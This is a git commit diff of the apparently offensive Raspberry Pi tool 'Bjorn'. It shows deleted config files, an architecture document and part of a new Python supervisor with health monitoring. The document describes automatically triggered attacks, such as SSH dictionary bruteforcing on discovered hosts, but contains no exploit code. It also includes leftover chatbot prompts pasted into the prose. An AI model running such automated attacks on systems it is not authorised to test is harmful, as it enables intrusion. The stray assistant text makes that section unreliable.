2 Commits

Author SHA1 Message Date
Fabien POLLY
eb20b168a6 Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
2026-02-18 22:36:10 +01:00
Fabien POLLY
b8a13cc698 wiki test 2026-01-24 18:06:18 +01:00
683 changed files with 53278 additions and 27509 deletions

2
.gitattributes vendored
View File

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

15
.github/FUNDING.yml vendored
View File

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']

View File

@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

View File

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.

View File

@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

View File

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

137
.gitignore vendored
View File

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like
instanbul/
istanbul/jest
jest/
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

652
.pylintrc
View File

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io

View File

@@ -1,148 +0,0 @@
# Bjorn Cyberviking Architecture
This document describes the internal workings of **Bjorn Cyberviking**.
> The architecture is designed to be **modular and asynchronous**, using multi-threading to handle the display, web interface, and cyber-security operations (scanning, attacks) simultaneously.
-----
## 1\. High-Level Overview
The system relies on a **"Producer-Consumer"** model orchestrated around shared memory and a central database.
### System Data Flow
* **User / WebUI**: Interacts with the `WebApp`, which uses `WebUtils` to read/write to the **SQLite DB**.
* **Kernel (Main Thread)**: `Bjorn.py` initializes the `SharedData` (global state in RAM).
* **Brain (Logic)**:
* **Scheduler**: Plans actions based on triggers and writes them to the DB.
* **Orchestrator**: Reads the queue from the DB, executes scripts from `/actions`, and updates results in the DB.
* **Output (Display)**: `Display.py` reads the current state from `SharedData` and renders it to the E-Paper Screen.
-----
## 2\. Core Components
### 2.1. The Entry Point (`Bjorn.py`)
This is the global conductor.
* **Role**: Initializes components, manages the application lifecycle, and handles stop signals.
* **Workflow**:
1. Loads configuration via `SharedData`.
2. Starts the display thread (`Display`).
3. Starts the web server thread (`WebApp`).
4. **Network Monitor**: As soon as an interface (Wi-Fi/Eth) is active, it starts the **Orchestrator** thread (automatic mode). If the network drops, it can pause the orchestrator.
### 2.2. Central Memory (`shared.py`)
This is the backbone of the program.
* **Role**: Stores the global state of Bjorn, accessible by all threads.
* **Content**:
* **Configuration**: Loaded from the DB (`config`).
* **Runtime State**: Current status (`IDLE`, `SCANNING`...), displayed text, indicators (wifi, bluetooth, battery).
* **Resources**: File paths, fonts, images loaded into RAM.
* **Singleton DB**: A unique instance of `BjornDatabase` to avoid access conflicts.
### 2.3. Persistent Storage (`database.py`)
A facade (wrapper) for **SQLite**.
* **Architecture**: Delegates specific operations to sub-modules (in `db_utils/`) to keep the code clean (e.g., `HostOps`, `QueueOps`, `VulnerabilityOps`).
* **Role**: Ensures persistence of discovered hosts, vulnerabilities, the action queue, and logs.
-----
## 3\. The Operational Core: Scheduler vs Orchestrator
This is where Bjorn's "intelligence" lies. The system separates **decision** from **action**.
### 3.1. The Scheduler (`action_scheduler.py`)
*It "thinks" but does not act.*
* **Role**: Analyzes the environment and populates the queue (`action_queue`).
* **Logic**:
* It loops regularly to check **Triggers** defined in actions (e.g., `on_new_host`, `on_open_port:80`, `on_interval:600`).
* If a condition is met (e.g., a new PC is discovered), it inserts the corresponding action into the database with the status `pending`.
* It manages priorities and avoids duplicates.
### 3.2. The Orchestrator (`orchestrator.py`)
*It acts but does not deliberate on strategic consequences.*
* **Role**: Consumes the queue.
* **Logic**:
1. Requests the next priority action (`pending`) from the DB.
2. Dynamically loads the corresponding Python module from the `/actions` folder (via `importlib`).
3. Executes the `run()` or `execute()` method of the action.
4. Updates the result (`success`/`failed`) in the DB.
5. Updates the status displayed on the screen (via `SharedData`).
-----
## 4\. User Interface
### 4.1. E-Ink Display (`display.py` & `epd_manager.py`)
* **EPD Manager**: `epd_manager.py` is a singleton handling low-level hardware access (SPI) to prevent conflicts and manage hardware timeouts.
* **Rendering**: `display.py` constructs the image in memory (**PIL**) by assembling:
* Bjorn's face (based on current status).
* Statistics (skulls, lightning bolts, coins).
* The "catchphrase" (generated by `comment.py`).
* **Optimization**: Uses partial refresh to avoid black/white flashing, except for periodic maintenance.
### 4.2. Web Interface (`webapp.py`)
* **Server**: A custom multi-threaded `http.server` (no heavy frameworks like Flask/Django to ensure lightness).
* **Architecture**:
* API requests are dynamically routed to `WebUtils` (`utils.py`).
* The frontend communicates primarily in **JSON**.
* Handles authentication and GZIP compression of assets.
### 4.3. The Commentator (`comment.py`)
Provides Bjorn's personality. It selects phrases from the database based on context (e.g., *"Bruteforcing SSH..."*) and the configured language, with a weighting and delay system to avoid spamming.
-----
Voici la section mise à jour avec le flux logique pour une attaque SSH sur le port 22 :
***
## 5. Typical Data Flow (Example)
Here is what happens when Bjorn identifies a vulnerable service:
1. **Scanning (Action)**: The Orchestrator executes a scan. It discovers IP `192.168.1.50` has **port 22 (SSH) open**.
2. **Storage**: The scanner saves the host and port status to the DB.
3. **Reaction (Scheduler)**: In the next cycle, the `ActionScheduler` detects the open port. It checks actions that have the `on_open_port:22` trigger.
4. **Planning**: It adds the `SSHBruteforce` action to the `action_queue` for this IP.
5. **Execution (Orchestrator)**: The Orchestrator finishes its current task, sees the `SSHBruteforce` in the queue, picks it up, and starts the dictionary attack.
6. **Feedback (Display)**: `SharedData` is updated. The screen displays *"Cracking 192.168.1.50"* with the corresponding face.
7. **Web**: The user sees the attack attempt and real-time logs on the web dashboard.
***
**Would you like me to create a diagram to illustrate this specific attack flow?**
-----
## 6\. Folder Structure
Although not provided here, the architecture implies this structure:
```text
/
├── Bjorn.py # Root program entry
├── orchestrator.py # Action consumer
├── shared.py # Shared memory
├── actions/ # Python modules containing attack/scan logic (dynamically loaded)
├── data/ # Stores bjorn.db and logs
├── web/ # HTML/JS/CSS files for the interface
└── resources/ # Images, fonts (.bmp, .ttf)
```
-----
**Would you like me to generate a Mermaid.js diagram code block (Flowchart) to visualize the Scheduler/Orchestrator loop described in section 3?**

656
Bjorn.py
View File

@@ -1,173 +1,625 @@
# bjorn.py # Bjorn.py
import threading # Main entry point and supervisor for the Bjorn project
import signal # Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
import logging import logging
import time import os
import sys import signal
import subprocess import subprocess
import re import sys
from init_shared import shared_data import threading
from display import Display, handle_exit_display import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia from comment import Commentaireia
from webapp import web_thread, handle_exit_web from display import Display, handle_exit_display
from orchestrator import Orchestrator from init_shared import shared_data
from logger import Logger from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG) logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
import fcntl
except Exception:
fcntl = None
def _release_instance_lock():
global _instance_lock_fd
if _instance_lock_fd is None:
return
try:
if fcntl is not None:
try:
fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
except Exception:
pass
_instance_lock_fd.close()
except Exception:
pass
_instance_lock_fd = None
def _acquire_instance_lock() -> bool:
"""Ensure only one Bjorn_160226 process can run at once."""
global _instance_lock_fd
if _instance_lock_fd is not None:
return True
try:
fd = open(_instance_lock_path, "a+", encoding="utf-8")
except Exception as exc:
logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
return True
if fcntl is None:
_instance_lock_fd = fd
return True
try:
fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
fd.seek(0)
fd.truncate()
fd.write(str(os.getpid()))
fd.flush()
except OSError:
try:
fd.seek(0)
owner_pid = fd.read().strip() or "unknown"
except Exception:
owner_pid = "unknown"
logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
try:
fd.close()
except Exception:
pass
return False
_instance_lock_fd = fd
return True
class HealthMonitor(threading.Thread):
"""Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""
def __init__(self, shared_data_, interval_s: int = 60):
super().__init__(daemon=True, name="HealthMonitor")
self.shared_data = shared_data_
self.interval_s = max(10, int(interval_s))
self._stop_event = threading.Event()
self._tm_prev_snapshot = None
self._tm_last_report = 0.0
def stop(self):
self._stop_event.set()
def _fd_count(self) -> int:
try:
return len(os.listdir("/proc/self/fd"))
except Exception:
return -1
def _rss_kb(self) -> int:
try:
with open("/proc/self/status", "r", encoding="utf-8") as fh:
for line in fh:
if line.startswith("VmRSS:"):
parts = line.split()
if len(parts) >= 2:
return int(parts[1])
except Exception:
pass
return -1
def _queue_counts(self):
pending = running = scheduled = -1
try:
# Using query_one safe method from database
row = self.shared_data.db.query_one(
"""
SELECT
SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
FROM action_queue
"""
)
if row:
pending = int(row.get("pending") or 0)
running = int(row.get("running") or 0)
scheduled = int(row.get("scheduled") or 0)
except Exception as exc:
logger.error_throttled(
f"Health monitor queue count query failed: {exc}",
key="health_queue_counts",
interval_s=120,
)
return pending, running, scheduled
def run(self):
while not self._stop_event.wait(self.interval_s):
try:
threads = threading.enumerate()
thread_count = len(threads)
top_threads = ",".join(t.name for t in threads[:8])
fd_count = self._fd_count()
rss_kb = self._rss_kb()
pending, running, scheduled = self._queue_counts()
# Lock to safely read shared metrics without race conditions
with self.shared_data.health_lock:
display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
epd_enabled = int(display_metrics.get("epd_enabled", 0))
epd_failures = int(display_metrics.get("failed_updates", 0))
epd_reinit = int(display_metrics.get("reinit_attempts", 0))
epd_headless = int(display_metrics.get("headless", 0))
epd_last_success = display_metrics.get("last_success_epoch", 0)
logger.info(
"health "
f"thread_count={thread_count} "
f"rss_kb={rss_kb} "
f"queue_pending={pending} "
f"epd_failures={epd_failures} "
f"epd_reinit={epd_reinit} "
)
# Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
try:
if tracemalloc.is_tracing():
now = time.monotonic()
tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
self._tm_last_report = now
top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
top_n = max(3, min(top_n, 25))
snap = tracemalloc.take_snapshot()
if self._tm_prev_snapshot is not None:
stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
else:
stats = snap.statistics("lineno")[:top_n]
logger.info(f"mem_top (tracemalloc, top_n={top_n})")
for st in stats:
logger.info(f"mem_top {st}")
self._tm_prev_snapshot = snap
except Exception as exc:
logger.error_throttled(
f"Health monitor tracemalloc failure: {exc}",
key="health_tracemalloc_error",
interval_s=300,
)
except Exception as exc:
logger.error_throttled(
f"Health monitor loop failure: {exc}",
key="health_loop_error",
interval_s=120,
)
class Bjorn: class Bjorn:
